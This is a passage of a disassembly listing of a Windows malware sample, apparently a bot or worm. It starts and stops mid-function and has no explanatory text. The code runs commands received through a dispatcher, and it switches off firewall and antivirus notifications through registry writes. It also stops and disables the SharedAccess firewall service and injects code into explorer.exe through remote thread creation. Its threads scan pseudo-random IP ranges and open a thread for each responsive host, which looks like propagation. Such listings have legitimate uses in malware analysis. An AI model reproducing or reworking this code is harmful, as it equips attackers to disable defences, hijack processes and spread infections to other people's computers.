; ---------------------------------------------------------------------------
loc_403394: ; CODE XREF: sub_403062+85�j
mov eax, [ebp+arg_4]
mov dword_40167C, eax
call sub_403A96
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033A6: ; CODE XREF: sub_403062+EE�j
call sub_4048CF
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033B0: ; CODE XREF: sub_403062+73�j
call sub_4048F9
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033BA: ; CODE XREF: sub_403062+134�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_4033D4
push [ebp+arg_4]
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_4043B4
loc_4033D4: ; CODE XREF: sub_403062+362�j
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033D9: ; CODE XREF: sub_403062+AC�j
call sub_4044C0
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_4033E3: ; CODE XREF: sub_403062+11A�j
push 10h
push dword_4014D4
call dword_401164 ; inet_ntoa
push eax
lea eax, [ebp+var_41C]
push eax
call dword_4010BC ; lstrcpynA
push dword_4014D8
call dword_401164 ; inet_ntoa
push eax
lea eax, [ebp+var_41C]
push eax
push offset aNi_16s_16s ; "[ni] %.16s %.16s"
push offset dword_401298
call dword_401104 ; wsprintfA
add esp, 10h
push offset dword_401298
call sub_402C53
jmp locret_4034B7
; ---------------------------------------------------------------------------
loc_403435: ; CODE XREF: sub_403062+66�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_403480
push offset aD ; "d"
push offset dword_401600
push 0
push 0
push 28h
push 0
push 0
push 0
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
push 0
call dword_4010A8 ; CreateProcessA
cmp eax, 1
jnz short loc_403476
push offset aExec_0 ; "[exec] :)"
call sub_402C53
jmp short loc_403480
; ---------------------------------------------------------------------------
loc_403476: ; CODE XREF: sub_403062+406�j
push offset aExec ; "[exec] :("
call sub_402C53
loc_403480: ; CODE XREF: sub_403062+59�j
; sub_403062+3DD�j ...
call sub_403A18
jmp short locret_4034B7
; ---------------------------------------------------------------------------
loc_403487: ; CODE XREF: sub_403062+FB�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_40349E
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_40414F
loc_40349E: ; CODE XREF: sub_403062+42F�j
jmp short locret_4034B7
; ---------------------------------------------------------------------------
loc_4034A0: ; CODE XREF: sub_403062+127�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short locret_4034B7
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_403F1F
locret_4034B7: ; CODE XREF: sub_403062+79�j
; sub_403062+B2�j ...
leave
retn 8
sub_403062 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034BB proc near ; CODE XREF: sub_4028D3+FD�p
; sub_402C9E+182�p
push ebp
mov ebp, esp
call dword_4010A4 ; GetTickCount
push eax
push offset dword_40170C
push offset a_8s08x ; "%.8s%08x"
push offset dword_401498
call dword_401104 ; wsprintfA
add esp, 10h
pop ebp
retn
sub_4034BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034DF proc near ; CODE XREF: sub_4025F4:loc_402625�p
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_122 = word ptr -122h
var_120 = word ptr -120h
var_11E = word ptr -11Eh
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
mov [ebp+var_8], offset aN ; "n"
mov [ebp+var_148], 1
and [ebp+var_128], 0
mov [ebp+var_124], 2
mov [ebp+var_123], 0
mov [ebp+var_122], 8
and [ebp+var_120], 0
and [ebp+var_11E], 0
push 0
lea eax, [ebp+var_124]
push eax
push 0
push 0
push 4
push 6
call dword_401044 ; GetCurrentProcess
push eax
call dword_401034 ; SetSecurityInfo
lea eax, [ebp+var_C]
push eax
push offset aSoftwareMicros ; "software\\microsoft\\ole"
push 80000002h
call dword_401030 ; RegCreateKeyA
push 2
push [ebp+var_8]
push 1
push 0
push offset aEnabledcom ; "enabledcom"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSystemCurrentc ; "system\\currentcontrolset\\control\\lsa"
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aRestrictanon_0 ; "restrictanonymoussam"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSystemCurren_0 ; "system\\currentcontrolset\\services\\lanma"...
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aAutoshareserve ; "autoshareserver"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aAutosharewks ; "autosharewks"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwareMicr_0 ; "software\\microsoft\\security center"
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aAntivirusdisab ; "antivirusdisablenotify"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aAntivirusoverr ; "antivirusoverride"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aFirewalldisabl ; "firewalldisablenotify"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aFirewalldisa_0 ; "firewalldisableoverride"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwarePolici ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwarePoli_0 ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call dword_401030 ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_C]
call dword_40102C ; RegSetValueExA
push [ebp+var_C]
call dword_401024 ; RegCloseKey
push 104h
lea eax, [ebp+var_118]
push eax
call dword_401070 ; GetWindowsDirectoryA
lea eax, [ebp+var_118]
push eax
push offset aSDebugDcpromo_ ; "%s\\debug\\dcpromo.log"
lea eax, [ebp+var_118]
push eax
call dword_401104 ; wsprintfA
add esp, 0Ch
push 1
lea eax, [ebp+var_118]
push eax
call dword_40109C ; _lcreat
push eax
call dword_4010A0 ; _lclose
push 1
lea eax, [ebp+var_118]
push eax
call dword_4010C4 ; SetFileAttributesA
push 22h
push 0
push 0
call dword_401008 ; OpenSCManagerA
mov [ebp+var_4], eax
push 22h
push offset aSharedaccess ; "sharedaccess"
push [ebp+var_4]
call dword_401004 ; OpenServiceA
mov [ebp+var_11C], eax
lea eax, [ebp+var_144]
push eax
push 1
push [ebp+var_11C]
call dword_401020 ; ControlService
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push [ebp+var_11C]
call dword_40101C ; ChangeServiceConfigA
push [ebp+var_11C]
call dword_40100C ; CloseServiceHandle
push [ebp+var_4]
call dword_40100C ; CloseServiceHandle
leave
retn
sub_4034DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037DC proc near ; CODE XREF: sub_402650+7F�p
; sub_4027AF+48�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
call dword_401044 ; GetCurrentProcess
mov [ebp+var_8], eax
mov eax, dword_401060
mov dword_401651, eax
mov eax, dword_40105C
mov dword_40165D, eax
mov eax, dword_401058
mov dword_401664, eax
mov eax, dword_4010D4
mov dword_40166D, eax
push offset aD ; "d"
push offset dword_401600
push 0
push 0
push 44h
push 0
push 0
push 0
push offset aExplorer_exe ; "explorer.exe"
push 0
call dword_4010A8 ; CreateProcessA
push 2
push 0
push 0
lea eax, [ebp+var_C]
push eax
push dword ptr aD ; "d"
push [ebp+var_8]
push [ebp+var_8]
call dword_401054 ; DuplicateHandle
mov eax, [ebp+var_C]
mov dword_40164C, eax
mov eax, [ebp+var_C]
mov dword_401658, eax
push 4
push 1000h
push 138h
push 0
push dword ptr aD ; "d"
call dword_401050 ; VirtualAllocEx
mov [ebp+var_4], eax
push 0
push 34h
push offset dword_401644
push [ebp+var_4]
push dword ptr aD ; "d"
call dword_40104C ; WriteProcessMemory
push 0
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
mov eax, [ebp+var_4]
add eax, 34h
push eax
push dword ptr aD ; "d"
call dword_40104C ; WriteProcessMemory
push 0
push 0
push 0
push [ebp+var_4]
push 0
push 0
push dword ptr aD ; "d"
call dword_401048 ; CreateRemoteThread
push 0
call dword_4010D4 ; ExitProcess
leave
retn
sub_4037DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038D9 proc near ; CODE XREF: sub_4027FE+2A�p
; sub_40414F+1D0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4038EA
; ---------------------------------------------------------------------------
loc_4038E3: ; CODE XREF: sub_4038D9+22�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4038EA: ; CODE XREF: sub_4038D9+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short locret_4038FD
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov byte ptr [eax], 0
jmp short loc_4038E3
; ---------------------------------------------------------------------------
locret_4038FD: ; CODE XREF: sub_4038D9+17�j
leave
retn 8
sub_4038D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403901 proc near ; CODE XREF: sub_4059EF+64�p
; sub_405AE6+42�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_403912
; ---------------------------------------------------------------------------
loc_40390B: ; CODE XREF: sub_403901+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403912: ; CODE XREF: sub_403901+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short locret_403927
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax], cl
jmp short loc_40390B
; ---------------------------------------------------------------------------
locret_403927: ; CODE XREF: sub_403901+17�j
leave
retn 0Ch
sub_403901 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40392B proc near ; CODE XREF: sub_4028D3+2E1�p
; sub_403F1F+72�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40393C
; ---------------------------------------------------------------------------
loc_403935: ; CODE XREF: sub_40392B+29�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40393C: ; CODE XREF: sub_40392B+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jnb short locret_403956
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_403935
; ---------------------------------------------------------------------------
locret_403956: ; CODE XREF: sub_40392B+17�j
leave
retn 0Ch
sub_40392B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40395A proc near ; CODE XREF: sub_4028D3+290�p
; sub_402C9E+1D�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
loc_40395D: ; CODE XREF: sub_40395A+29�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_403985
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_40397C
mov eax, [ebp+arg_0]
jmp short loc_403987
; ---------------------------------------------------------------------------
dw 7EBh
; ---------------------------------------------------------------------------
loc_40397C: ; CODE XREF: sub_40395A+19�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40395D
; ---------------------------------------------------------------------------
loc_403985: ; CODE XREF: sub_40395A+B�j
xor eax, eax
loc_403987: ; CODE XREF: sub_40395A+1E�j
pop ebp
retn 8
sub_40395A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40398B proc near ; CODE XREF: MEW:00404B90�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4039AC
mov eax, [ebp+var_4]
jmp short locret_403A14
; ---------------------------------------------------------------------------
loc_4039AC: ; CODE XREF: sub_40398B+1A�j
jmp short loc_4039B5
; ---------------------------------------------------------------------------
loc_4039AE: ; CODE XREF: sub_40398B+44�j
; sub_40398B+85�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4039B5: ; CODE XREF: sub_40398B:loc_4039AC�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_403A12
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_4039D1
jmp short loc_4039AE
; ---------------------------------------------------------------------------
loc_4039D1: ; CODE XREF: sub_40398B+42�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_4039D7: ; CODE XREF: sub_40398B:loc_403A08�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4039E8
mov eax, [ebp+var_4]
jmp short locret_403A14
; ---------------------------------------------------------------------------
dw 20EBh
; ---------------------------------------------------------------------------
loc_4039E8: ; CODE XREF: sub_40398B+54�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
mov edx, [ebp+var_C]
inc edx
mov [ebp+var_C], edx
mov edx, [ebp+var_8]
inc edx
mov [ebp+var_8], edx
cmp ecx, eax
jz short loc_403A08
jmp short loc_403A0A
; ---------------------------------------------------------------------------
loc_403A08: ; CODE XREF: sub_40398B+79�j
jmp short loc_4039D7
; ---------------------------------------------------------------------------
loc_403A0A: ; CODE XREF: sub_40398B+7B�j
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
jmp short loc_4039AE
; ---------------------------------------------------------------------------
loc_403A12: ; CODE XREF: sub_40398B+32�j
xor eax, eax
locret_403A14: ; CODE XREF: sub_40398B+1F�j
; sub_40398B+59�j
leave
retn 8
sub_40398B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A18 proc near ; CODE XREF: sub_4028D3+9�p
; sub_403062:loc_403480�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
push offset aDnsapi_dll ; "dnsapi.dll"
call dword_401068 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short locret_403A4F
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push [ebp+var_4]
call dword_401064 ; GetProcAddress
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short locret_403A4F
call [ebp+var_8]
locret_403A4F: ; CODE XREF: sub_403A18+1B�j
; sub_403A18+32�j
leave
retn
sub_403A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A51 proc near ; CODE XREF: sub_402C9E:loc_402FBA�p
; sub_403062+328�p
push ebp
mov ebp, esp
cmp dword_401680, 1
jnz short loc_403A94
and dword_401680, 0
push 0
push 0
push 0BD01h
push offset loc_403AA5
push 0
push 0
call dword_4010B4 ; CreateThread
push 0
push 0
push 1BD01h
push offset loc_403AA5
push 0
push 0
call dword_4010B4 ; CreateThread
loc_403A94: ; CODE XREF: sub_403A51+A�j
pop ebp
retn
sub_403A51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A96 proc near ; CODE XREF: sub_403062+33A�p
push ebp
mov ebp, esp
mov dword_401680, 1
pop ebp
retn
sub_403A96 endp
; ---------------------------------------------------------------------------
loc_403AA5: ; DATA XREF: sub_403A51+1C�o
; sub_403A51+34�o
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call dword_4010A4 ; GetTickCount
mov esi, eax
call dword_40106C ; GetCurrentThreadId
xor esi, eax
mov [ebp-1Ch], esi
cmp dword_4014D8, 0FFFFFFFFh
jnz short loc_403AD3
mov eax, [ebp-1Ch]
shl eax, 10h
mov [ebp-14h], eax
jmp short loc_403AEC
; ---------------------------------------------------------------------------
loc_403AD3: ; CODE XREF: MEW:00403AC6�j
movzx eax, byte ptr dword_4014D8
shl eax, 18h
movzx ecx, byte ptr dword_4014D8+1
shl ecx, 10h
or eax, ecx
mov [ebp-14h], eax
loc_403AEC: ; CODE XREF: MEW:00403AD1�j
mov eax, [ebp+8]
shr eax, 10h
jnz short loc_403B04
mov dword ptr [ebp-18h], 0FFFF0000h
mov dword ptr [ebp-4], 0FF00h
jmp short loc_403B12
; ---------------------------------------------------------------------------
loc_403B04: ; CODE XREF: MEW:00403AF2�j
mov dword ptr [ebp-18h], 0FF000000h
mov dword ptr [ebp-4], 0FFFF00h
loc_403B12: ; CODE XREF: MEW:00403B02�j
mov eax, [ebp+8]
and eax, 0FFFFh
mov [ebp-8], ax
loc_403B1E: ; CODE XREF: MEW:00403B8C�j
cmp dword_401680, 0
jnz short loc_403B8E
mov eax, [ebp-14h]
and eax, [ebp-18h]
mov ecx, [ebp-1Ch]
and ecx, [ebp-4]
or eax, ecx
mov [ebp-10h], eax
push 400h
call dword_4010DC ; Sleep
mov eax, [ebp-10h]
mov [ebp-0Ch], eax
jmp short loc_403B54
; ---------------------------------------------------------------------------
loc_403B4B: ; CODE XREF: MEW:00403B77�j
mov eax, [ebp-0Ch]
add eax, 20h
mov [ebp-0Ch], eax
loc_403B54: ; CODE XREF: MEW:00403B49�j
mov eax, [ebp-10h]
add eax, 100h
cmp [ebp-0Ch], eax
jnb short loc_403B79
push dword ptr [ebp-8]
push dword ptr [ebp-0Ch]
call sub_403B95
push 200h
call dword_4010DC ; Sleep
jmp short loc_403B4B
; ---------------------------------------------------------------------------
loc_403B79: ; CODE XREF: MEW:00403B5F�j
call dword_4010A4 ; GetTickCount
mov esi, eax
call dword_40106C ; GetCurrentThreadId
xor esi, eax
mov [ebp-1Ch], esi
jmp short loc_403B1E
; ---------------------------------------------------------------------------
loc_403B8E: ; CODE XREF: MEW:00403B25�j
xor eax, eax
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B95 proc near ; CODE XREF: MEW:00403B67�p
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = word ptr -2B8h
var_2B6 = word ptr -2B6h
var_2B4 = dword ptr -2B4h
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = dword ptr -18Ch
var_88 = dword ptr -88h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2C4h
mov [ebp+var_2BC], 1
and [ebp+var_2A0], 0
and [ebp+var_190], 0
mov [ebp+var_2B8], 2
mov ax, [ebp+arg_4]
mov [ebp+var_2B6], ax
and [ebp+var_2A8], 0
and [ebp+var_2A4], 0
and [ebp+var_4], 0
jmp short loc_403BE5
; ---------------------------------------------------------------------------
loc_403BDE: ; CODE XREF: sub_403B95+194�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403BE5: ; CODE XREF: sub_403B95+47�j
cmp [ebp+var_4], 20h
jge loc_403D2E
push 6
push 1
push 2
call dword_401160 ; socket
mov ecx, [ebp+var_4]
mov [ebp+ecx*4+var_88], eax
lea eax, [ebp+var_2BC]
push eax
push 8004667Eh
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_401154 ; ioctlsocket
loc_403C21: ; CODE XREF: sub_403B95+10A�j
and [ebp+var_2C0], 0
jmp short loc_403C37
; ---------------------------------------------------------------------------
loc_403C2A: ; CODE XREF: sub_403B95:loc_403C60�j
mov eax, [ebp+var_2C0]
inc eax
mov [ebp+var_2C0], eax
loc_403C37: ; CODE XREF: sub_403B95+93�j
mov eax, [ebp+var_2C0]
cmp eax, [ebp+var_2A0]
jnb short loc_403C62
mov eax, [ebp+var_2C0]
mov ecx, [ebp+var_4]
mov eax, [ebp+eax*4+var_29C]
cmp eax, [ebp+ecx*4+var_88]
jnz short loc_403C60
jmp short loc_403C62
; ---------------------------------------------------------------------------
loc_403C60: ; CODE XREF: sub_403B95+C7�j
jmp short loc_403C2A
; ---------------------------------------------------------------------------
loc_403C62: ; CODE XREF: sub_403B95+AE�j
; sub_403B95+C9�j
mov eax, [ebp+var_2C0]
cmp eax, [ebp+var_2A0]
jnz short loc_403C9D
cmp [ebp+var_2A0], 40h
jnb short loc_403C9D
mov eax, [ebp+var_2C0]
mov ecx, [ebp+var_4]
mov ecx, [ebp+ecx*4+var_88]
mov [ebp+eax*4+var_29C], ecx
mov eax, [ebp+var_2A0]
inc eax
mov [ebp+var_2A0], eax
loc_403C9D: ; CODE XREF: sub_403B95+D9�j
; sub_403B95+E2�j
xor eax, eax
jnz short loc_403C21
loc_403CA1: ; CODE XREF: sub_403B95+18A�j
and [ebp+var_2C4], 0
jmp short loc_403CB7
; ---------------------------------------------------------------------------
loc_403CAA: ; CODE XREF: sub_403B95:loc_403CE0�j
mov eax, [ebp+var_2C4]
inc eax
mov [ebp+var_2C4], eax
loc_403CB7: ; CODE XREF: sub_403B95+113�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_190]
jnb short loc_403CE2
mov eax, [ebp+var_2C4]
mov ecx, [ebp+var_4]
mov eax, [ebp+eax*4+var_18C]
cmp eax, [ebp+ecx*4+var_88]
jnz short loc_403CE0
jmp short loc_403CE2
; ---------------------------------------------------------------------------
loc_403CE0: ; CODE XREF: sub_403B95+147�j
jmp short loc_403CAA
; ---------------------------------------------------------------------------
loc_403CE2: ; CODE XREF: sub_403B95+12E�j
; sub_403B95+149�j
mov eax, [ebp+var_2C4]
cmp eax, [ebp+var_190]
jnz short loc_403D1D
cmp [ebp+var_190], 40h
jnb short loc_403D1D
mov eax, [ebp+var_2C4]
mov ecx, [ebp+var_4]
mov ecx, [ebp+ecx*4+var_88]
mov [ebp+eax*4+var_18C], ecx
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
loc_403D1D: ; CODE XREF: sub_403B95+159�j
; sub_403B95+162�j
xor eax, eax
jnz short loc_403CA1
push 10h
call dword_4010DC ; Sleep
jmp loc_403BDE
; ---------------------------------------------------------------------------
loc_403D2E: ; CODE XREF: sub_403B95+54�j
and [ebp+var_4], 0
jmp short loc_403D3B
; ---------------------------------------------------------------------------
loc_403D34: ; CODE XREF: sub_403B95+1D8�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403D3B: ; CODE XREF: sub_403B95+19D�j
cmp [ebp+var_4], 20h
jge short loc_403D6F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call dword_401158 ; ntohl
mov [ebp+var_2B4], eax
push 10h
lea eax, [ebp+var_2B8]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_40112C ; connect
jmp short loc_403D34
; ---------------------------------------------------------------------------
loc_403D6F: ; CODE XREF: sub_403B95+1AA�j
push 1400h
call dword_4010DC ; Sleep
lea eax, [ebp+var_2A8]
push eax
push 0
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_2A0]
push eax
push 0
call dword_401138 ; select
mov [ebp+var_194], eax
and [ebp+var_4], 0
jmp short loc_403DAC
; ---------------------------------------------------------------------------
loc_403DA5: ; CODE XREF: sub_403B95:loc_403E0A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403DAC: ; CODE XREF: sub_403B95+20E�j
cmp [ebp+var_4], 20h
jge short loc_403E0C
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_401140 ; closesocket
cmp [ebp+var_194], 0FFFFFFFFh
jz short loc_403DFF
lea eax, [ebp+var_2A0]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call sub_405C4E ; __WSAFDIsSet
test eax, eax
jnz short loc_403E0A
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call sub_405C4E ; __WSAFDIsSet
test eax, eax
jnz short loc_403E0A
loc_403DFF: ; CODE XREF: sub_403B95+234�j
mov eax, [ebp+var_4]
or [ebp+eax*4+var_88], 0FFFFFFFFh
loc_403E0A: ; CODE XREF: sub_403B95+24E�j
; sub_403B95+268�j
jmp short loc_403DA5
; ---------------------------------------------------------------------------
loc_403E0C: ; CODE XREF: sub_403B95+21B�j
and [ebp+var_4], 0
jmp short loc_403E19
; ---------------------------------------------------------------------------
loc_403E12: ; CODE XREF: sub_403B95:loc_403E55�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_403E19: ; CODE XREF: sub_403B95+27B�j
cmp [ebp+var_4], 20h
jge short locret_403E57
mov eax, [ebp+var_4]
cmp [ebp+eax*4+var_88], 0FFFFFFFFh
jz short loc_403E55
push 0
push 0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax
call dword_401158 ; ntohl
push eax
push offset loc_40581A
push 0
push 0
call dword_4010B4 ; CreateThread
push 8
call dword_4010DC ; Sleep
loc_403E55: ; CODE XREF: sub_403B95+295�j
jmp short loc_403E12
; ---------------------------------------------------------------------------
locret_403E57: ; CODE XREF: sub_403B95+288�j
leave
retn 8
sub_403B95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E5B proc near ; CODE XREF: sub_402C9E+E3�p
; sub_403E5B+39�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov eax, [ebp+arg_0]
mov al, [eax]
mov [ebp+var_4], al
cmp [ebp+var_4], 0
jz short loc_403E7C
cmp [ebp+var_4], 2Ah
jz short loc_403E8C
cmp [ebp+var_4], 3Fh
jz short loc_403EC4
jmp short loc_403EE5
; ---------------------------------------------------------------------------
loc_403E7C: ; CODE XREF: sub_403E5B+11�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
neg eax
sbb eax, eax
inc eax
jmp loc_403F1A
; ---------------------------------------------------------------------------
loc_403E8C: ; CODE XREF: sub_403E5B+17�j
push [ebp+arg_4]
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_403E5B
cmp eax, 1
jnz short loc_403EA5
xor eax, eax
inc eax
jmp short loc_403F1A
; ---------------------------------------------------------------------------
db 0EBh
db 1Fh
; ---------------------------------------------------------------------------
loc_403EA5: ; CODE XREF: sub_403E5B+41�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_403EC0
mov eax, [ebp+arg_4]
inc eax
push eax
push [ebp+arg_0]
call sub_403E5B
jmp short loc_403F1A
; ---------------------------------------------------------------------------
dw 4EBh
; ---------------------------------------------------------------------------
loc_403EC0: ; CODE XREF: sub_403E5B+52�j
xor eax, eax
jmp short loc_403F1A
; ---------------------------------------------------------------------------
loc_403EC4: ; CODE XREF: sub_403E5B+1D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_403ED4
xor eax, eax
jmp short loc_403F1A
; ---------------------------------------------------------------------------
dw 11EBh
; ---------------------------------------------------------------------------
loc_403ED4: ; CODE XREF: sub_403E5B+71�j
mov eax, [ebp+arg_4]
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
